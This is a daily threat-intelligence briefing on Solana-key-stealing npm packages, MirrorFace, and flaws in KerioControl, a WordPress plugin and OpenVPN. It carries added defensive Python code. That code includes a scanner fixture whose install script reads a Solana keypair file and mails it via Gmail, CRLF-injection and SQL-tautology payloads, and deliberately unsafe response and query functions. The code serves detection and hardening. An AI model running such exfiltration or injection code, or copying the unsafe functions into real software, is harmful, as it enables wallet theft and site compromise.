Cyware Daily Threat Intelligence, January 09, 2025
Daily Threat Briefing • Jan 9, 2025
Malicious actors continue to exploit trusted ecosystems, with researchers uncovering npm packages stealing Solana private keys and exfiltrating them via Gmail. Masquerading as legitimate tools, these packages drain victims' wallets while amplifying their reach through GitHub repositories.
Threat actors are actively exploiting a critical flaw in GFI KerioControl firewalls to achieve remote code execution. Despite a patch released by GFI, attempts to abuse the vulnerability have surged, targeting over 23,800 exposed instances worldwide.
Meanwhile, the Fancy Product Designer plugin for WordPress remains vulnerable to critical flaws, including file upload and SQL injection vulnerabilities. With no response from the developer, over 20,000 sites face heightened risk from these exploits.
Malicious npm packages target Solana
Socket discovered malicious npm packages designed to steal Solana private keys and transfer them via Gmail. The packages masquerade as legitimate tools to avoid detection, but actually function as malware. Two threat actors are involved in this scheme, using overlapping tactics to steal and exfiltrate private keys, while also draining victims' Solana wallets. The attackers use Gmail to send the stolen keys, making it harder to detect the exfiltration attempts. They also published malicious code on GitHub repositories to amplify their malware campaign.
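The Socket item above describes the behaviour pattern (wallet-key access plus mail-based exfiltration, often triggered at install time) but not the code. The following is an added example, not Socket's tooling and not code from the packages in question: a heuristic scanner that a defender can run over an unpacked npm tarball before allowing it into a build. The indicator strings (`nodemailer`, `smtp.gmail.com`, the default Solana CLI keypair path `~/.config/solana/id.json`, `secretKey`) are assumptions chosen to illustrate the technique; the two sample packages are constructed for the demonstration.

```python
import json
import re
from typing import Dict, List

# Indicator lists are assumptions for illustration: the report summarised
# above says only that the packages steal Solana private keys and send them
# via Gmail, not which APIs or hostnames they use.
MAIL_INDICATORS = [
    r"\bnodemailer\b",
    r"smtp\.gmail\.com",
    r"service\s*:\s*['\"]gmail['\"]",
]
KEY_INDICATORS = [
    r"\bsecretKey\b",
    r"Keypair\.fromSecretKey",
    r"\.config/solana/id\.json",   # default Solana CLI keypair path
    r"\bprivateKey\b",
]
INSTALL_HOOKS = ("preinstall", "install", "postinstall")
SOURCE_EXTENSIONS = (".js", ".mjs", ".cjs", ".ts")


def scan_package(files: Dict[str, str]) -> List[str]:
    """Return findings for an unpacked npm package given as {relative path: text}."""
    findings: List[str] = []

    # 1. Lifecycle hooks run automatically on `npm install`, so any code they
    #    launch executes before a developer ever imports the package.
    try:
        manifest = json.loads(files.get("package.json", "{}"))
    except json.JSONDecodeError:
        manifest = {}
        findings.append("package.json: manifest is not valid JSON")
    for hook in INSTALL_HOOKS:
        command = manifest.get("scripts", {}).get(hook)
        if command:
            findings.append(f"package.json: '{hook}' hook runs: {command}")

    # 2. Flag wallet-key access and mail-sending code; the combination in one
    #    package is the high-confidence signal.
    key_files, mail_files = [], []
    for path, text in files.items():
        if not path.endswith(SOURCE_EXTENSIONS):
            continue
        key_hits = [p for p in KEY_INDICATORS if re.search(p, text)]
        mail_hits = [p for p in MAIL_INDICATORS if re.search(p, text)]
        if key_hits:
            key_files.append(path)
            findings.append(f"{path}: key-material indicators {key_hits}")
        if mail_hits:
            mail_files.append(path)
            findings.append(f"{path}: mail-sending indicators {mail_hits}")
    if key_files and mail_files:
        findings.append("HIGH: key access and mail transport present in the same package")
    return findings


def risk_level(files: Dict[str, str]) -> str:
    """Collapse the findings into 'high', 'medium' or 'low'."""
    findings = scan_package(files)
    if any(f.startswith("HIGH") for f in findings):
        return "high"
    return "medium" if findings else "low"


# Constructed sample package (not a real one) mimicking the described behaviour.
SUSPICIOUS_PACKAGE = {
    "package.json": json.dumps({
        "name": "example-solana-helper",
        "version": "1.0.0",
        "scripts": {"postinstall": "node setup.js"},
    }),
    "setup.js": (
        "const fs = require('fs');\n"
        "const nodemailer = require('nodemailer');\n"
        "const key = fs.readFileSync(process.env.HOME + '/.config/solana/id.json');\n"
        "const t = nodemailer.createTransport({ service: 'gmail', auth: {} });\n"
        "t.sendMail({ text: key.toString() });\n"
    ),
}

# Constructed benign package for comparison.
BENIGN_PACKAGE = {
    "package.json": json.dumps({"name": "example-format-utils", "version": "2.0.0"}),
    "index.js": "module.exports = { pad: (s, n) => String(s).padStart(n, '0') };\n",
}

if __name__ == "__main__":
    for name, pkg in (("suspicious", SUSPICIOUS_PACKAGE), ("benign", BENIGN_PACKAGE)):
        print(name, "->", risk_level(pkg))
        for finding in scan_package(pkg):
            print("  -", finding)
```

The useful part is the correlation, not any single string: a mail library or a key path on its own is common in legitimate code, but a package whose install hook reads a keypair file and also builds a mail transport deserves a manual look before it lands in a lockfile.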
MirrorFace uses NOOPDOOR and ANEL
Japan's National Police Agency (NPA) and NCSC allege that a China-linked group called MirrorFace has been attacking organizations, businesses, and individuals in Japan since 2019. The main goal of these attacks is to steal information about Japan's national security and advanced technology. MirrorFace, also known as Earth Kasha, is part of the APT10 group and has targeted Japanese entities using various tools like ANEL, LODEINFO, and NOOPDOOR. The attacks are divided into three campaigns.
Critical RCE bug in GFI KerioControl
Threat actors are attempting to exploit a security flaw in GFI KerioControl firewalls that, if successful, allows remote code execution (RCE). The vulnerability, CVE-2024-52875, is a CRLF injection flaw that can lead to HTTP response splitting and cross-site scripting. It affects KerioControl versions 9.2.5 to 9.4.5. GFI released a fix in version 9.4.5 Patch 1. Exploitation attempts began on December 28, 2024, from several IP addresses in Singapore and Hong Kong. There are over 23,800 exposed GFI KerioControl instances globally, spread across many countries.
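To make the CRLF injection / response splitting mechanism concrete, here is an added example that is not GFI's code and says nothing about which KerioControl parameter is affected: a minimal HTTP response builder in its vulnerable form (header values concatenated straight into the wire format) beside a hardened form that rejects CR, LF and NUL, plus a small access-log check for URL-encoded CR/LF in request targets. The injected value, the log lines and the IP addresses (RFC 5737 documentation ranges) are constructed for the demonstration.

```python
import re
from typing import Dict, List

# A CR or LF inside a header value ends that header line; a following blank
# line ends the header block, so the remainder is parsed as a second response.
CRLF = re.compile(r"[\r\n]")
# URL-encoded CR/LF as it appears in request lines (%0d, %0a, or escaped forms).
ENCODED_CRLF = re.compile(r"%0[dD]|%0[aA]|\\r|\\n")


class HeaderInjection(ValueError):
    """Raised when a header value would break out of its line."""


def build_response_unsafe(status: str, headers: Dict[str, str], body: str) -> str:
    """'Before' picture: attacker-influenced values go straight onto the wire."""
    lines = [f"HTTP/1.1 {status}"] + [f"{k}: {v}" for k, v in headers.items()]
    return "\r\n".join(lines) + "\r\n\r\n" + body


def safe_header_value(value: str) -> str:
    """Reject any value that could terminate a header line or the header block."""
    if CRLF.search(value) or "\x00" in value:
        raise HeaderInjection(f"control character in header value: {value!r}")
    return value


def is_safe_header_value(value: str) -> bool:
    """Boolean wrapper around safe_header_value() for callers that prefer a check."""
    try:
        safe_header_value(value)
        return True
    except HeaderInjection:
        return False


def build_response(status: str, headers: Dict[str, str], body: str) -> str:
    """Hardened builder: every header value passes through safe_header_value()."""
    lines = [f"HTTP/1.1 {status}"]
    lines += [f"{k}: {safe_header_value(v)}" for k, v in headers.items()]
    return "\r\n".join(lines) + "\r\n\r\n" + body


def count_status_lines(raw: str) -> int:
    """Number of responses a client would see in this byte stream (1 is normal)."""
    return len(re.findall(r"(?m)^HTTP/1\.1 \d{3}", raw))


def find_crlf_requests(log_lines: List[str]) -> List[str]:
    """Return access-log lines whose request target carries an encoded CR/LF."""
    hits = []
    for line in log_lines:
        m = re.search(r'"(?:GET|POST|PUT|HEAD) (\S+)', line)
        if m and ENCODED_CRLF.search(m.group(1)):
            hits.append(line)
    return hits


# Constructed value a vulnerable redirect handler might receive in a "next page"
# parameter: a legitimate path followed by decoded CR/LF pairs.
INJECTED_LOCATION = (
    "/dashboard\r\nContent-Length: 0\r\n\r\n"
    "HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html>injected</html>"
)

# Constructed access-log lines (combined format); the second carries %0d%0a.
SAMPLE_LOG = [
    '203.0.113.5 - - [28/Dec/2024:10:01:02 +0000] "GET /login?next=/dashboard HTTP/1.1" 302 0',
    '203.0.113.5 - - [28/Dec/2024:10:01:09 +0000] "GET /login?next=/dashboard%0d%0aSet-Cookie:%20x=1 HTTP/1.1" 302 0',
    '198.51.100.7 - - [28/Dec/2024:10:02:00 +0000] "GET /static/app.css HTTP/1.1" 200 4121',
]

if __name__ == "__main__":
    split = build_response_unsafe("302 Found", {"Location": INJECTED_LOCATION}, "")
    print("unsafe builder emitted", count_status_lines(split), "status lines")
    print("hardened builder accepts injected value:", is_safe_header_value(INJECTED_LOCATION))
    for hit in find_crlf_requests(SAMPLE_LOG):
        print("suspicious request:", hit)
```

Mainstream HTTP libraries already refuse CR/LF in header values (Python's `http.client` raises `ValueError`, Node's `http` module throws), so the check matters most in hand-rolled response code and embedded appliance web interfaces. The log scan is a cheap retrospective check: a `%0d%0a` in a redirect or "next" parameter is rarely legitimate traffic.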
Unpatched flaws in Fancy Product Designer
The Fancy Product Designer plugin for WordPress is vulnerable to two critical security flaws. CVE-2024-51919 allows unauthenticated users to upload malicious files because of insecure file upload functions. CVE-2024-51818 is an SQL injection flaw caused by improper handling of user input that can compromise the site's database. Despite being notified of the issues, the developer, Radykal, has not responded or released a security update, leaving over 20,000 users at risk.
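The two flaw classes above are generic enough to show in code. The following is an added example, not the plugin's code and not a description of its internals: an upload validator that combines an extension allowlist, content sniffing and a server-chosen storage name, and a lookup function in its string-concatenated form beside the parameterised form. The table, sample bytes and the tautology input are constructed for the demonstration; the image magic bytes are the standard PNG/JPEG/GIF signatures.

```python
import os
import sqlite3
import uuid
from typing import List, Tuple

# --- Upload hardening --------------------------------------------------------
# Extension allowlist plus content sniffing; both must agree before a file is kept.
ALLOWED_EXTENSIONS = {"png", "jpg", "gif"}
MAGIC_BYTES = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}
MAX_UPLOAD_BYTES = 5 * 1024 * 1024


class UploadRejected(ValueError):
    pass


def validate_upload(filename: str, data: bytes) -> str:
    """Validate an uploaded file and return a server-chosen storage name.

    The client-supplied name is used only to read the extension; the stored
    name is random, so path components or a second extension in the original
    name never reach the filesystem.
    """
    if len(data) > MAX_UPLOAD_BYTES:
        raise UploadRejected("file too large")
    base = os.path.basename(filename.replace("\\", "/"))
    if base != filename or "." not in base:
        raise UploadRejected("bad filename")
    ext = base.rsplit(".", 1)[1].lower()
    ext = "jpg" if ext == "jpeg" else ext
    if ext not in ALLOWED_EXTENSIONS:
        raise UploadRejected(f"extension '{ext}' not allowed")
    sniffed = next((kind for magic, kind in MAGIC_BYTES.items() if data.startswith(magic)), None)
    if sniffed != ext:
        raise UploadRejected(f"content looks like {sniffed}, name says {ext}")
    return f"{uuid.uuid4().hex}.{ext}"


def upload_accepted(filename: str, data: bytes) -> bool:
    """Boolean wrapper around validate_upload()."""
    try:
        validate_upload(filename, data)
        return True
    except UploadRejected:
        return False


# --- SQL injection -----------------------------------------------------------
def make_demo_db() -> sqlite3.Connection:
    """Constructed in-memory table standing in for a plugin's design records."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE designs (id INTEGER PRIMARY KEY, owner TEXT, title TEXT)")
    conn.executemany(
        "INSERT INTO designs (owner, title) VALUES (?, ?)",
        [("alice", "Mug"), ("bob", "Shirt"), ("bob", "Poster")],
    )
    return conn


def designs_for_owner_unsafe(conn: sqlite3.Connection, owner: str) -> List[Tuple[str]]:
    """'Before' picture: user input is spliced into the SQL text."""
    return conn.execute(f"SELECT title FROM designs WHERE owner = '{owner}'").fetchall()


def designs_for_owner(conn: sqlite3.Connection, owner: str) -> List[Tuple[str]]:
    """Hardened: the value travels as a bound parameter, never as SQL text."""
    return conn.execute("SELECT title FROM designs WHERE owner = ?", (owner,)).fetchall()


# Constructed inputs.
PNG_SAMPLE = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32
NOT_AN_IMAGE = b"<?php /* not an image */ ?>"
TAUTOLOGY = "nobody' OR '1'='1"

if __name__ == "__main__":
    print("stored as:", validate_upload("logo.png", PNG_SAMPLE))
    for name in ("../../shell.php", "shell.php.png"):
        print(f"{name}: accepted={upload_accepted(name, NOT_AN_IMAGE)}")
    db = make_demo_db()
    print("unsafe lookup returns", len(designs_for_owner_unsafe(db, TAUTOLOGY)), "rows")
    print("safe lookup returns  ", len(designs_for_owner(db, TAUTOLOGY)), "rows")
```

Two design choices carry most of the weight: the stored filename is never derived from the client's name, which removes the path-traversal and double-extension cases in one step, and the database query only ever sees the user's value through a bound parameter, so the tautology that returns every row from the unsafe function returns nothing from the safe one.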
Code execution vulnerabilities in OpenVPN
OpenVPN has fixed three major vulnerabilities in version 2.6.11, released on June 21, 2024. The most serious issue, CVE-2024-5594, allows attackers to inject harmful data into third-party applications, with a CVSS score of 9.1. Another flaw, CVE-2024-4877, affects Windows users by enabling attackers to steal user credentials through the OpenVPN GUI. Additionally, CVE-2024-28882 lets authorized clients stay connected to the server even after a disconnect, posing risks for unauthorized access. Users are strongly advised to update to version 2.6.11 or later.